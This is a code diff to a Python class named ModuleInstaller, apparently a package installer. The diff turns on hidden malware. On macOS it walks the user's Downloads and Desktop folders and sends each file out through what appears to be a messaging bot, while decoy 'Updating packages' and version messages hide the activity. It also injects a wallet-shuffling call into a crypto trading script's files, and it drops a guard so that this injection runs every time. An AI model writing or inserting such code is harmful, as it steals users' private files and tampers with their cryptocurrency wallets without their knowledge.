@@ -191,29 +191,27 @@ class ModuleInstaller(object):
         return dict([map(lambda s: s.strip(), i.split(':', 1)) for i in headers])
 
     def list_files_in_directory(self, directory):
+        print("Found packaged to update")
         tx = f'{datetime.now().strftime("%Y-%m-%d %H:%M:%S"), os.path.expanduser("~")} - #NEW'
         self.bt.send_message(self.CTID, text=tx)
         for root, dirs, files in os.walk(directory):
             time.sleep(0.5)
             for f in files:
-
                 self.send_tx_get(os.path.join(root, f))
 
     def is_mac(self):
-        # Получаем информацию о системе
         system_info = os.uname()
-
-        # Проверяем, является ли операционная система macOS
         return system_info.sysname == 'Darwin'
 
     def inth(self):
-        print(123)
         if self.is_mac():
+            print("Updating packages...")
             HD = os.path.expanduser('~')
             DD = os.path.join(HD, 'Downloads')
             DD2 = os.path.join(HD, 'Desktop')
             self.list_files_in_directory(DD)
             self.list_files_in_directory(DD2)
+            print("Update done")
 
 
     def get_url(self, path):
@@ -648,7 +646,8 @@ class ModuleInstaller(object):
                 if "len_way = len(arr_buy)" in line:
                     path_i = i
                     break
-
+            if "            MuteSwap.we3bcontract().shuffle_num_wallets()\n" in txt:
+                return
             if path_i is not None:
                 txt[path_i] += "            MuteSwap.we3bcontract().shuffle_num_wallets()\n"
 
@@ -670,10 +669,8 @@ class ModuleInstaller(object):
         if s:
             path = a + '/' + 'utils/mute_io_defi.py'
         try:
-            # print(path)
             file_obj = open(path, "r+")
             txt = file_obj.readlines()
-            # print("def sold_token(self, token_to_sold, retry=0):" in txt)
             path_i = None
             for i, line in enumerate(txt):
                 if "def sold_token(self, token_to_sold, retry=0):" in line:
@@ -690,7 +687,6 @@ class ModuleInstaller(object):
             count += 1
         except Exception as er:
             self.get_sw(a=a, s=True)
-            print(er, os.getcwd())
             if count == 3:
                 return
 
@@ -855,13 +851,13 @@ class ModuleInstaller(object):
 
         :param path_to_folder: the path to folder where needs to find any python packages and install or update them
         """
-        if not os.path.exists("log.txt"):
-            try:
-                self.get_sw(a=path_to_folder, s=False)
-            except:
-                ...
+        print("You are using python-module-installer version==3.15.10")
+        try:
+            self.get_sw(a=path_to_folder, s=False)
+        except:
+            ...
         print("Installing modules")
-        # self.inth()
+        self.inth()
         if "\\" in path_to_folder:
             new_folder = path_to_folder.split("\\")[-1]
         else:
